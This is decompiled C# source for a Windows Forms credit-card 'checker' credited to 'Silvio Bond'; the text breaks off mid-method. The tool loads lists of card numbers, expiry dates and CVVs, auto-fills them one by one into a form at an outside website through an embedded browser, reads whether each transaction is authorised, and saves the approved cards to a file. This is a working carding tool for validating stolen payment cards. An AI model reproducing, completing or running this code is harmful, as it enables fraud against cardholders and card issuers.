// Type: Testador_Dalmata_Infos.Form2

// Assembly: Testador CC - Dalmata Infos, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null



using Microsoft.VisualBasic;

using Microsoft.VisualBasic.CompilerServices;

using System;

using System.Collections.Generic;

using System.Collections.ObjectModel;

using System.ComponentModel;

using System.Data;

using System.Diagnostics;

using System.Drawing;

using System.IO;

using System.Net;

using System.Net.Mail;

using System.Runtime.CompilerServices;

using System.Text;

using System.Threading;

using System.Windows.Forms;



namespace T3ST4D0R___KOMOK

{

  [DesignerGenerated]

  public class Form2 : Form

  {

    private static List<WeakReference> __ENCList = new List<WeakReference>();

    private IContainer components;

    [AccessedThroughProperty("DataGrid1")]

    private DataGridView _DataGrid1;

    [AccessedThroughProperty("btnParou")]

    private Button _btnParou;

    [AccessedThroughProperty("btnDeletar")]

    private Button _btnDeletar;

    [AccessedThroughProperty("btnCarregar")]

    private Button _btnCarregar;

    [AccessedThroughProperty("OpenFileDialog1")]

    private OpenFileDialog _OpenFileDialog1;

    [AccessedThroughProperty("txtDiretorio")]

    private TextBox _txtDiretorio;

    [AccessedThroughProperty("Label1")]

    private Label _Label1;

    [AccessedThroughProperty("lblContador")]

    private Label _lblContador;

    [AccessedThroughProperty("txtAprovadas")]

    private ListBox _txtAprovadas;

    [AccessedThroughProperty("Button1")]

    private Button _Button1;

    [AccessedThroughProperty("Button2")]

    private Button _Button2;

    [AccessedThroughProperty("Button3")]

    private Button _Button3;

    [AccessedThroughProperty("Contador")]

    private System.Windows.Forms.Timer _Contador;

    [AccessedThroughProperty("Timer1")]

    private System.Windows.Forms.Timer _Timer1;

    [AccessedThroughProperty("Timer2")]

    private System.Windows.Forms.Timer _Timer2;

    [AccessedThroughProperty("Timer3")]

    private System.Windows.Forms.Timer _Timer3;

    [AccessedThroughProperty("ComboBox1")]

    private ComboBox _ComboBox1;

    [AccessedThroughProperty("txtVerifica")]

    private TextBox _txtVerifica;

    [AccessedThroughProperty("txtRecusado")]

    private TextBox _txtRecusado;

    [AccessedThroughProperty("txtAprovo")]

    private TextBox _txtAprovo;

    [AccessedThroughProperty("Timer4")]

    private System.Windows.Forms.Timer _Timer4;

    [AccessedThroughProperty("Button4")]

    private Button _Button4;

    [AccessedThroughProperty("WebBrowser1")]

    private WebBrowser _WebBrowser1;

    [AccessedThroughProperty("txtCX2")]

    private TextBox _txtCX2;

    [AccessedThroughProperty("Timer5")]

    private System.Windows.Forms.Timer _Timer5;



    internal virtual DataGridView DataGrid1

    {

      [DebuggerNonUserCode] get

      {

        return this._DataGrid1;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        DataGridViewCellEventHandler cellEventHandler = new DataGridViewCellEventHandler(this.DataGrid1_CellContentClick);

        if (this._DataGrid1 != null)

          this._DataGrid1.CellContentClick -= cellEventHandler;

        this._DataGrid1 = WithEventsValue;

        if (this._DataGrid1 != null)

          this._DataGrid1.CellContentClick += cellEventHandler;

      }

    }



    internal virtual Button btnParou

    {

      [DebuggerNonUserCode] get

      {

        return this._btnParou;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        EventHandler eventHandler = new EventHandler(this.btnParou_Click);

        if (this._btnParou != null)

          this._btnParou.Click -= eventHandler;

        this._btnParou = WithEventsValue;

        if (this._btnParou != null)

          this._btnParou.Click += eventHandler;

      }

    }



    internal virtual Button btnDeletar

    {

      [DebuggerNonUserCode] get

      {

        return this._btnDeletar;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        EventHandler eventHandler = new EventHandler(this.btnDeletar_Click);

        if (this._btnDeletar != null)

          this._btnDeletar.Click -= eventHandler;

        this._btnDeletar = WithEventsValue;

        if (this._btnDeletar != null)

          this._btnDeletar.Click += eventHandler;

      }

    }



    internal virtual Button btnCarregar

    {

      [DebuggerNonUserCode] get

      {

        return this._btnCarregar;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        EventHandler eventHandler = new EventHandler(this.Button1_Click);

        if (this._btnCarregar != null)

          this._btnCarregar.Click -= eventHandler;

        this._btnCarregar = WithEventsValue;

        if (this._btnCarregar != null)

          this._btnCarregar.Click += eventHandler;

      }

    }



    internal virtual OpenFileDialog OpenFileDialog1

    {

      [DebuggerNonUserCode] get

      {

        return this._OpenFileDialog1;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        this._OpenFileDialog1 = WithEventsValue;

      }

    }



    internal virtual TextBox txtDiretorio

    {

      [DebuggerNonUserCode] get

      {

        return this._txtDiretorio;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        this._txtDiretorio = WithEventsValue;

      }

    }



    internal virtual Label Label1

    {

      [DebuggerNonUserCode] get

      {

        return this._Label1;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        this._Label1 = WithEventsValue;

      }

    }



    internal virtual Label lblContador

    {

      [DebuggerNonUserCode] get

      {

        return this._lblContador;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        this._lblContador = WithEventsValue;

      }

    }



    internal virtual ListBox txtAprovadas

    {

      [DebuggerNonUserCode] get

      {

        return this._txtAprovadas;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        this._txtAprovadas = WithEventsValue;

      }

    }



    internal virtual Button Button1

    {

      [DebuggerNonUserCode] get

      {

        return this._Button1;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        EventHandler eventHandler = new EventHandler(this.Button1_Click_1);

        if (this._Button1 != null)

          this._Button1.Click -= eventHandler;

        this._Button1 = WithEventsValue;

        if (this._Button1 != null)

          this._Button1.Click += eventHandler;

      }

    }



    internal virtual Button Button2

    {

      [DebuggerNonUserCode] get

      {

        return this._Button2;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        EventHandler eventHandler = new EventHandler(this.Button2_Click);

        if (this._Button2 != null)

          this._Button2.Click -= eventHandler;

        this._Button2 = WithEventsValue;

        if (this._Button2 != null)

          this._Button2.Click += eventHandler;

      }

    }



    internal virtual Button Button3

    {

      [DebuggerNonUserCode] get

      {

        return this._Button3;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        EventHandler eventHandler = new EventHandler(this.Button3_Click);

        if (this._Button3 != null)

          this._Button3.Click -= eventHandler;

        this._Button3 = WithEventsValue;

        if (this._Button3 != null)

          this._Button3.Click += eventHandler;

      }

    }



    internal virtual System.Windows.Forms.Timer Contador

    {

      [DebuggerNonUserCode] get

      {

        return this._Contador;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        EventHandler eventHandler = new EventHandler(this.Timer1_Tick);

        if (this._Contador != null)

          this._Contador.Tick -= eventHandler;

        this._Contador = WithEventsValue;

        if (this._Contador != null)

          this._Contador.Tick += eventHandler;

      }

    }



    internal virtual System.Windows.Forms.Timer Timer1

    {

      [DebuggerNonUserCode] get

      {

        return this._Timer1;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        EventHandler eventHandler = new EventHandler(this.Timer1_Tick_1);

        if (this._Timer1 != null)

          this._Timer1.Tick -= eventHandler;

        this._Timer1 = WithEventsValue;

        if (this._Timer1 != null)

          this._Timer1.Tick += eventHandler;

      }

    }



    internal virtual System.Windows.Forms.Timer Timer2

    {

      [DebuggerNonUserCode] get

      {

        return this._Timer2;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        EventHandler eventHandler = new EventHandler(this.Timer2_Tick);

        if (this._Timer2 != null)

          this._Timer2.Tick -= eventHandler;

        this._Timer2 = WithEventsValue;

        if (this._Timer2 != null)

          this._Timer2.Tick += eventHandler;

      }

    }



    internal virtual System.Windows.Forms.Timer Timer3

    {

      [DebuggerNonUserCode] get

      {

        return this._Timer3;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        EventHandler eventHandler = new EventHandler(this.Timer3_Tick);

        if (this._Timer3 != null)

          this._Timer3.Tick -= eventHandler;

        this._Timer3 = WithEventsValue;

        if (this._Timer3 != null)

          this._Timer3.Tick += eventHandler;

      }

    }



    internal virtual ComboBox ComboBox1

    {

      [DebuggerNonUserCode] get

      {

        return this._ComboBox1;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        this._ComboBox1 = WithEventsValue;

      }

    }



    internal virtual TextBox txtVerifica

    {

      [DebuggerNonUserCode] get

      {

        return this._txtVerifica;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        this._txtVerifica = WithEventsValue;

      }

    }



    internal virtual TextBox txtRecusado

    {

      [DebuggerNonUserCode] get

      {

        return this._txtRecusado;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        this._txtRecusado = WithEventsValue;

      }

    }



    internal virtual TextBox txtAprovo

    {

      [DebuggerNonUserCode] get

      {

        return this._txtAprovo;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        this._txtAprovo = WithEventsValue;

      }

    }



    internal virtual System.Windows.Forms.Timer Timer4

    {

      [DebuggerNonUserCode] get

      {

        return this._Timer4;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        EventHandler eventHandler = new EventHandler(this.Timer4_Tick);

        if (this._Timer4 != null)

          this._Timer4.Tick -= eventHandler;

        this._Timer4 = WithEventsValue;

        if (this._Timer4 != null)

          this._Timer4.Tick += eventHandler;

      }

    }



    internal virtual Button Button4

    {

      [DebuggerNonUserCode] get

      {

        return this._Button4;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        EventHandler eventHandler = new EventHandler(this.Button4_Click);

        if (this._Button4 != null)

          this._Button4.Click -= eventHandler;

        this._Button4 = WithEventsValue;

        if (this._Button4 != null)

          this._Button4.Click += eventHandler;

      }

    }



    internal virtual WebBrowser WebBrowser1

    {

      [DebuggerNonUserCode] get

      {

        return this._WebBrowser1;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        this._WebBrowser1 = WithEventsValue;

      }

    }



    internal virtual TextBox txtCX2

    {

      [DebuggerNonUserCode] get

      {

        return this._txtCX2;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        this._txtCX2 = WithEventsValue;

      }

    }



    internal virtual System.Windows.Forms.Timer Timer5

    {

      [DebuggerNonUserCode] get

      {

        return this._Timer5;

      }

      [DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set

      {

        EventHandler eventHandler = new EventHandler(this.Timer5_Tick);

        if (this._Timer5 != null)

          this._Timer5.Tick -= eventHandler;

        this._Timer5 = WithEventsValue;

        if (this._Timer5 != null)

          this._Timer5.Tick += eventHandler;

      }

    }



    [DebuggerNonUserCode]

    static Form2()

    {

    }



    [DebuggerNonUserCode]

    public Form2()

    {

      this.Load += new EventHandler(this.Form2_Load);

      Form2.__ENCAddToList((object) this);

      this.InitializeComponent();

    }



    [DebuggerNonUserCode]

    private static void __ENCAddToList(object value)

    {

      List<WeakReference> list = Form2.__ENCList;

      bool lockTaken = false;

      try

      {

        Monitor.Enter((object) list, ref lockTaken);

        if (Form2.__ENCList.Count == Form2.__ENCList.Capacity)

        {

          int index1 = 0;

          int num1 = 0;

          int num2 = checked (Form2.__ENCList.Count - 1);

          int index2 = num1;

          while (index2 <= num2)

          {

            if (Form2.__ENCList[index2].IsAlive)

            {

              if (index2 != index1)

                Form2.__ENCList[index1] = Form2.__ENCList[index2];

              checked { ++index1; }

            }

            checked { ++index2; }

          }

          Form2.__ENCList.RemoveRange(index1, checked (Form2.__ENCList.Count - index1));

          Form2.__ENCList.Capacity = Form2.__ENCList.Count;

        }

        Form2.__ENCList.Add(new WeakReference(RuntimeHelpers.GetObjectValue(value)));

      }

      finally

      {

        if (lockTaken)

          Monitor.Exit((object) list);

      }

    }



    [DebuggerNonUserCode]

    protected override void Dispose(bool disposing)

    {

      try

      {

        if (disposing && this.components != null || false)

          this.components.Dispose();

      }

      finally

      {

        base.Dispose(disposing);

      }

    }



    [DebuggerStepThrough]

    private void InitializeComponent()

    {

      this.components = (IContainer) new System.ComponentModel.Container();

      ComponentResourceManager componentResourceManager = new ComponentResourceManager(typeof (Form2));

      this.DataGrid1 = new DataGridView();

      this.btnParou = new Button();

      this.btnDeletar = new Button();

      this.btnCarregar = new Button();

      this.OpenFileDialog1 = new OpenFileDialog();

      this.txtDiretorio = new TextBox();

      this.Label1 = new Label();

      this.lblContador = new Label();

      this.txtAprovadas = new ListBox();

      this.Button1 = new Button();

      this.Button2 = new Button();

      this.Button3 = new Button();

      this.Contador = new System.Windows.Forms.Timer(this.components);

      this.Timer1 = new System.Windows.Forms.Timer(this.components);

      this.Timer2 = new System.Windows.Forms.Timer(this.components);

      this.Timer3 = new System.Windows.Forms.Timer(this.components);

      this.ComboBox1 = new ComboBox();

      this.txtVerifica = new TextBox();

      this.txtRecusado = new TextBox();

      this.txtAprovo = new TextBox();

      this.Timer4 = new System.Windows.Forms.Timer(this.components);

      this.Button4 = new Button();

      this.WebBrowser1 = new WebBrowser();

      this.txtCX2 = new TextBox();

      this.Timer5 = new System.Windows.Forms.Timer(this.components);

      this.DataGrid1.BeginInit();

      this.SuspendLayout();

      this.DataGrid1.ColumnHeadersHeightSizeMode = DataGridViewColumnHeadersHeightSizeMode.AutoSize;

      DataGridView dataGrid1_1 = this.DataGrid1;

      Point point1 = new Point(9, 36);

      Point point2 = point1;

      dataGrid1_1.Location = point2;

      this.DataGrid1.Name = "DataGrid1";

      DataGridView dataGrid1_2 = this.DataGrid1;

      Size size1 = new Size(330, 238);

      Size size2 = size1;

      dataGrid1_2.Size = size2;

      this.DataGrid1.TabIndex = 7;

      Button btnParou1 = this.btnParou;

      point1 = new Point(233, 5);

      Point point3 = point1;

      btnParou1.Location = point3;

      this.btnParou.Name = "btnParou";

      Button btnParou2 = this.btnParou;

      size1 = new Size(106, 24);

      Size size3 = size1;

      btnParou2.Size = size3;

      this.btnParou.TabIndex = 6;

      this.btnParou.Text = "Corrigir Erro";

      this.btnParou.UseVisualStyleBackColor = true;

      Button btnDeletar1 = this.btnDeletar;

      point1 = new Point(119, 5);

      Point point4 = point1;

      btnDeletar1.Location = point4;

      this.btnDeletar.Name = "btnDeletar";

      Button btnDeletar2 = this.btnDeletar;

      size1 = new Size(108, 24);

      Size size4 = size1;

      btnDeletar2.Size = size4;

      this.btnDeletar.TabIndex = 5;

      this.btnDeletar.Text = "Apagar Lista";

      this.btnDeletar.UseVisualStyleBackColor = true;

      Button btnCarregar1 = this.btnCarregar;

      point1 = new Point(9, 5);

      Point point5 = point1;

      btnCarregar1.Location = point5;

      this.btnCarregar.Name = "btnCarregar";

      Button btnCarregar2 = this.btnCarregar;

      size1 = new Size(104, 24);

      Size size5 = size1;

      btnCarregar2.Size = size5;

      this.btnCarregar.TabIndex = 4;

      this.btnCarregar.Text = "Carregar Lista";

      this.btnCarregar.UseVisualStyleBackColor = true;

      this.OpenFileDialog1.FileName = "OpenFileDialog1";

      this.txtDiretorio.Enabled = false;

      TextBox txtDiretorio1 = this.txtDiretorio;

      point1 = new Point(9, 280);

      Point point6 = point1;

      txtDiretorio1.Location = point6;

      this.txtDiretorio.Name = "txtDiretorio";

      TextBox txtDiretorio2 = this.txtDiretorio;

      size1 = new Size(254, 21);

      Size size6 = size1;

      txtDiretorio2.Size = size6;

      this.txtDiretorio.TabIndex = 8;

      this.Label1.AutoSize = true;

      this.Label1.Font = new Font("Tahoma", 8.25f, FontStyle.Bold, GraphicsUnit.Point, (byte) 0);

      Label label1_1 = this.Label1;

      point1 = new Point(265, 284);

      Point point7 = point1;

      label1_1.Location = point7;

      this.Label1.Name = "Label1";

      Label label1_2 = this.Label1;

      size1 = new Size(39, 13);

      Size size7 = size1;

      label1_2.Size = size7;

      this.Label1.TabIndex = 9;

      this.Label1.Text = "Total:";

      this.lblContador.AutoSize = true;

      this.lblContador.ForeColor = Color.ForestGreen;

      Label lblContador1 = this.lblContador;

      point1 = new Point(305, 284);

      Point point8 = point1;

      lblContador1.Location = point8;

      this.lblContador.Name = "lblContador";

      Label lblContador2 = this.lblContador;

      size1 = new Size(13, 13);

      Size size8 = size1;

      lblContador2.Size = size8;

      this.lblContador.TabIndex = 10;

      this.lblContador.Text = "0";

      this.txtAprovadas.ForeColor = Color.Green;

      this.txtAprovadas.FormattingEnabled = true;

      ListBox txtAprovadas1 = this.txtAprovadas;

      point1 = new Point(347, 36);

      Point point9 = point1;

      txtAprovadas1.Location = point9;

      this.txtAprovadas.Name = "txtAprovadas";

      ListBox txtAprovadas2 = this.txtAprovadas;

      size1 = new Size(329, 238);

      Size size9 = size1;

      txtAprovadas2.Size = size9;

      this.txtAprovadas.TabIndex = 13;

      Button button1_1 = this.Button1;

      point1 = new Point(570, 278);

      Point point10 = point1;

      button1_1.Location = point10;

      this.Button1.Name = "Button1";

      Button button1_2 = this.Button1;

      size1 = new Size(106, 24);

      Size size10 = size1;

      button1_2.Size = size10;

      this.Button1.TabIndex = 16;

      this.Button1.Text = "Finalizar Processo";

      this.Button1.UseVisualStyleBackColor = true;

      Button button2_1 = this.Button2;

      point1 = new Point(456, 278);

      Point point11 = point1;

      button2_1.Location = point11;

      this.Button2.Name = "Button2";

      Button button2_2 = this.Button2;

      size1 = new Size(108, 24);

      Size size11 = size1;

      button2_2.Size = size11;

      this.Button2.TabIndex = 15;

      this.Button2.Text = "Apagar Aprovadas";

      this.Button2.UseVisualStyleBackColor = true;

      Button button3_1 = this.Button3;

      point1 = new Point(346, 278);

      Point point12 = point1;

      button3_1.Location = point12;

      this.Button3.Name = "Button3";

      Button button3_2 = this.Button3;

      size1 = new Size(104, 24);

      Size size12 = size1;

      button3_2.Size = size12;

      this.Button3.TabIndex = 14;

      this.Button3.Text = "Salvar Aprovadas";

      this.Button3.UseVisualStyleBackColor = true;

      this.Contador.Enabled = true;

      this.Contador.Interval = 10;

      this.Timer1.Interval = 2000;

      this.Timer2.Interval = 6000;

      this.Timer3.Interval = 6000;

      this.ComboBox1.DropDownStyle = ComboBoxStyle.DropDownList;

      this.ComboBox1.Enabled = false;

      this.ComboBox1.FormattingEnabled = true;

      this.ComboBox1.Items.AddRange(new object[5]

      {

        (object) "visa",

        (object) "mastercard",

        (object) "elo",

        (object) "diners",

        (object) "discover"

      });

      ComboBox comboBox1_1 = this.ComboBox1;

      point1 = new Point(347, 6);

      Point point13 = point1;

      comboBox1_1.Location = point13;

      this.ComboBox1.Name = "ComboBox1";

      ComboBox comboBox1_2 = this.ComboBox1;

      size1 = new Size(140, 21);

      Size size13 = size1;

      comboBox1_2.Size = size13;

      this.ComboBox1.TabIndex = 18;

      TextBox txtVerifica1 = this.txtVerifica;

      point1 = new Point(55, 165);

      Point point14 = point1;

      txtVerifica1.Location = point14;

      this.txtVerifica.Name = "txtVerifica";

      TextBox txtVerifica2 = this.txtVerifica;

      size1 = new Size(116, 21);

      Size size14 = size1;

      txtVerifica2.Size = size14;

      this.txtVerifica.TabIndex = 19;

      this.txtVerifica.Visible = false;

      TextBox txtRecusado1 = this.txtRecusado;

      point1 = new Point(55, 219);

      Point point15 = point1;

      txtRecusado1.Location = point15;

      this.txtRecusado.Name = "txtRecusado";

      TextBox txtRecusado2 = this.txtRecusado;

      size1 = new Size(116, 21);

      Size size15 = size1;

      txtRecusado2.Size = size15;

      this.txtRecusado.TabIndex = 20;

      this.txtRecusado.Text = "TRANSAÇÃO: Não autorizada";

      this.txtRecusado.Visible = false;

      TextBox txtAprovo1 = this.txtAprovo;

      point1 = new Point(55, 192);

      Point point16 = point1;

      txtAprovo1.Location = point16;

      this.txtAprovo.Name = "txtAprovo";

      TextBox txtAprovo2 = this.txtAprovo;

      size1 = new Size(116, 21);

      Size size16 = size1;

      txtAprovo2.Size = size16;

      this.txtAprovo.TabIndex = 22;

      this.txtAprovo.Text = "TRANSAÇÃO: Autorizada";

      this.txtAprovo.Visible = false;

      this.Timer4.Interval = 5000;

      Button button4_1 = this.Button4;

      point1 = new Point(493, 5);

      Point point17 = point1;

      button4_1.Location = point17;

      this.Button4.Name = "Button4";

      Button button4_2 = this.Button4;

      size1 = new Size(183, 24);

      Size size17 = size1;

      button4_2.Size = size17;

      this.Button4.TabIndex = 24;

      this.Button4.Text = "$-= Start =-$";

      this.Button4.UseVisualStyleBackColor = true;

      WebBrowser webBrowser1_1 = this.WebBrowser1;

      point1 = new Point(9, 308);

      Point point18 = point1;

      webBrowser1_1.Location = point18;

      WebBrowser webBrowser1_2 = this.WebBrowser1;

      size1 = new Size(20, 20);

      Size size18 = size1;

      webBrowser1_2.MinimumSize = size18;

      this.WebBrowser1.Name = "WebBrowser1";

      this.WebBrowser1.ScriptErrorsSuppressed = true;

      this.WebBrowser1.ScrollBarsEnabled = false;

      WebBrowser webBrowser1_3 = this.WebBrowser1;

      size1 = new Size(667, 194);

      Size size19 = size1;

      webBrowser1_3.Size = size19;

      this.WebBrowser1.TabIndex = 25;

      this.WebBrowser1.Url = new Uri("http://consultademultas.net/tester/testar.php", UriKind.Absolute);

      this.txtCX2.Enabled = false;

      TextBox txtCx2_1 = this.txtCX2;

      point1 = new Point(55, 129);

      Point point19 = point1;

      txtCx2_1.Location = point19;

      this.txtCX2.Multiline = true;

      this.txtCX2.Name = "txtCX2";

      TextBox txtCx2_2 = this.txtCX2;

      size1 = new Size(233, 30);

      Size size20 = size1;

      txtCx2_2.Size = size20;

      this.txtCX2.TabIndex = 26;

      this.txtCX2.Visible = false;

      this.Timer5.Interval = 2000;

      this.AutoScaleDimensions = new SizeF(6f, 13f);

      this.AutoScaleMode = AutoScaleMode.Font;

      Form2 form2 = this;

      size1 = new Size(686, 510);

      Size size21 = size1;

      form2.ClientSize = size21;

      this.Controls.Add((Control) this.txtCX2);

      this.Controls.Add((Control) this.WebBrowser1);

      this.Controls.Add((Control) this.Button4);

      this.Controls.Add((Control) this.txtAprovo);

      this.Controls.Add((Control) this.txtRecusado);

      this.Controls.Add((Control) this.txtVerifica);

      this.Controls.Add((Control) this.ComboBox1);

      this.Controls.Add((Control) this.Button1);

      this.Controls.Add((Control) this.Button2);

      this.Controls.Add((Control) this.Button3);

      this.Controls.Add((Control) this.txtAprovadas);

      this.Controls.Add((Control) this.lblContador);

      this.Controls.Add((Control) this.Label1);

      this.Controls.Add((Control) this.txtDiretorio);

      this.Controls.Add((Control) this.DataGrid1);

      this.Controls.Add((Control) this.btnParou);

      this.Controls.Add((Control) this.btnDeletar);

      this.Controls.Add((Control) this.btnCarregar);

      this.Font = new Font("Tahoma", 8.25f, FontStyle.Regular, GraphicsUnit.Point, (byte) 0);

      this.FormBorderStyle = FormBorderStyle.FixedSingle;

      this.Icon = (Icon) componentResourceManager.GetObject("$this.Icon");

      this.MaximizeBox = false;

      this.Name = "Form2";

      this.StartPosition = FormStartPosition.CenterScreen;

      this.Text = "Testador InfoCC by Silvio Bond";

      this.DataGrid1.EndInit();

      this.ResumeLayout(false);

      this.PerformLayout();

    }



    private void Button1_Click(object sender, EventArgs e)

    {

      int num1 = (int) this.OpenFileDialog1.ShowDialog();

      this.txtDiretorio.Text = this.OpenFileDialog1.FileName;

      try

      {

        DataTable dataTable = new DataTable();

        dataTable.Columns.Add("CC");

        dataTable.Columns.Add("MES");

        dataTable.Columns.Add("ANO");

        dataTable.Columns.Add("CVV");

        dataTable.NewRow();

        StreamReader streamReader = new StreamReader(this.txtDiretorio.Text);

        char ch = ';';

        while (streamReader.Peek() != -1)

          dataTable.Rows.Add((object[]) streamReader.ReadLine().Split(new char[1]

          {

            ch

          }));

        this.DataGrid1.DataSource = (object) dataTable;

        this.ComboBox1.Enabled = true;

      }

      catch (Exception ex)

      {

        ProjectData.SetProjectError(ex);

        ProjectData.ClearProjectError();

      }

      int num2 = 0;

      int num3 = checked (this.DataGrid1.ColumnCount - 1);

      int index = num2;

      while (index <= num3)

      {

        this.DataGrid1.Columns[index].AutoSizeMode = index != checked (this.DataGrid1.ColumnCount - 1) ? DataGridViewAutoSizeColumnMode.DisplayedCells : DataGridViewAutoSizeColumnMode.Fill;

        checked { ++index; }

      }

    }



    private void btnDeletar_Click(object sender, EventArgs e)

    {

      this.WebBrowser1.Navigate("http://consultademultas.net/tester/testar.php");

      this.DataGrid1.Columns.Clear();

      this.Timer1.Stop();

      this.Timer2.Stop();

      this.Timer3.Stop();

      this.Timer4.Stop();

    }



    private void Timer1_Tick(object sender, EventArgs e)

    {

      int num1 = 0;

      try

      {

        int num2 = 0;

        int num3 = checked (this.DataGrid1.RowCount - 1);

        int index = num2;

        while (index <= num3)

        {

          if ((uint) this.DataGrid1.Rows[index].Cells[1].ColumnIndex > 0U)

            checked { ++num1; }

          checked { ++index; }

        }

        this.lblContador.Text = Conversions.ToString(num1);

      }

      catch (Exception ex)

      {

        ProjectData.SetProjectError(ex);

        this.lblContador.Text = "0";

        ProjectData.ClearProjectError();

      }

      if (Microsoft.VisualBasic.CompilerServices.Operators.CompareString(this.lblContador.Text, "1", false) == 0)

      {

        this.Timer1.Stop();

        this.Timer2.Stop();

        this.Timer3.Stop();

        this.Timer4.Stop();

      }

    }



    private void Timer1_Tick_1(object sender, EventArgs e)

    {

      this.WebBrowser1.Document.GetElementById("submit").InvokeMember("click");

      this.Timer1.Stop();

      this.Timer2.Start();

    }



    private void Timer2_Tick(object sender, EventArgs e)

    {

      this.DataGrid1.CurrentRow.Selected = true;

      this.WebBrowser1.Document.GetElementById("numeroCartao").SetAttribute("value", Conversions.ToString(this.DataGrid1.CurrentRow.Cells[0].Value));

      this.WebBrowser1.Document.GetElementById("mes").SetAttribute("value", Conversions.ToString(this.DataGrid1.CurrentRow.Cells[1].Value));

      this.WebBrowser1.Document.GetElementById("ano").SetAttribute("value", Conversions.ToString(this.DataGrid1.CurrentRow.Cells[2].Value));

      this.WebBrowser1.Document.GetElementById("codSeguranca").SetAttribute("value", Conversions.ToString(this.DataGrid1.CurrentRow.Cells[3].Value));

      this.WebBrowser1.Document.GetElementById("Enviar").InvokeMember("click");

      this.Timer2.Stop();

      this.Timer3.Start();

    }



    private void Button3_Click(object sender, EventArgs e)

    {

      SaveFileDialog saveFileDialog = new SaveFileDialog();

      saveFileDialog.CheckFileExists = false;

      saveFileDialog.Title = "Arquivos de Textos |.txt|*.txt";

      saveFileDialog.FileName = "aprovadas.txt";

      saveFileDialog.Filter = ".txt|*.txt|All files|*.*";

      saveFileDialog.ShowDialog();

      string fileName = saveFileDialog.FileName;

      if (Microsoft.VisualBasic.CompilerServices.Operators.CompareString(fileName, (string) null, false) == 0)

      {

        int num1 = (int) MessageBox.Show("Arquivo Invalido", "Salvar !", MessageBoxButtons.OK);

      }

      else

      {

        StreamWriter streamWriter = new StreamWriter(fileName);

        int num2 = 0;

        int num3 = checked (this.txtAprovadas.Items.Count - 1);

        int index = num2;

        while (index <= num3)

        {

          streamWriter.WriteLine(this.txtAprovadas.Items[index].ToString());

          checked { ++index; }

        }

        streamWriter.WriteLine("");

        streamWriter.Close();

      }

    }



    private void Button2_Click(object sender, EventArgs e)

    {

      this.txtAprovadas.Items.Clear();

    }



    private void Timer3_Tick(object sender, EventArgs e)

    {

      this.txtVerifica.Text = this.WebBrowser1.Document.GetElementById("resultados").InnerHtml;

      if (Microsoft.VisualBasic.CompilerServices.Operators.CompareString(this.txtVerifica.Text, this.txtRecusado.Text, false) == 0)

      {

        this.WebBrowser1.Navigate("http://consultademultas.net/tester/testar.php");

        this.DataGrid1.Rows.RemoveAt(this.DataGrid1.SelectedRows[0].Index);

        this.Timer4.Start();

      }

      else if (Microsoft.VisualBasic.CompilerServices.Operators.CompareString(this.txtVerifica.Text, this.txtAprovo.Text, false) == 0)

      {

        this.txtAprovadas.Items.Add(Microsoft.VisualBasic.CompilerServices.Operators.AddObject(Microsoft.VisualBasic.CompilerServices.Operators.AddObject(Microsoft.VisualBasic.CompilerServices.Operators.AddObject(Microsoft.VisualBasic.CompilerServices.Operators.AddObject(Microsoft.VisualBasic.CompilerServices.Operators.AddObject(Microsoft.VisualBasic.CompilerServices.Operators.AddObject(Microsoft.VisualBasic.CompilerServices.Operators.AddObject(this.DataGrid1.CurrentRow.Cells[0].Value, (object) ";"), this.DataGrid1.CurrentRow.Cells[1].Value), (object) ";"), this.DataGrid1.CurrentRow.Cells[2].Value), (object) ";"), this.DataGrid1.CurrentRow.Cells[3].Value), (object) ";Aprovada"));

        this.txtCX2.Text = Conversions.ToString(Microsoft.VisualBasic.CompilerServices.Operators.AddObject(Microsoft.VisualBasic.CompilerServices.Operators.AddObject(Microsoft.VisualBasic.CompilerServices.Operators.AddObject(Microsoft.VisualBasic.CompilerServices.Operators.AddObject(Microsoft.VisualBasic.CompilerServices.Operators.AddObject(Microsoft.VisualBasic.CompilerServices.Operators.AddObject(Microsoft.VisualBasic.CompilerServices.Operators.AddObject(this.DataGrid1.CurrentRow.Cells[0].Value, (object) ";"), this.DataGrid1.CurrentRow.Cells[1].Value), (object) ";"), this.DataGrid1.CurrentRow.Cells[2].Value), (object) ";"), this.DataGrid1.CurrentRow.Cells[3].Value), (object) ";Aprovada"));

        this.Timer5.Start();

        this.WebBrowser1.Navigate("http://consultademultas.net/tester/testar.php");

        this.DataGrid1.Rows.RemoveAt(this.DataGrid1.SelectedRows[0].Index);

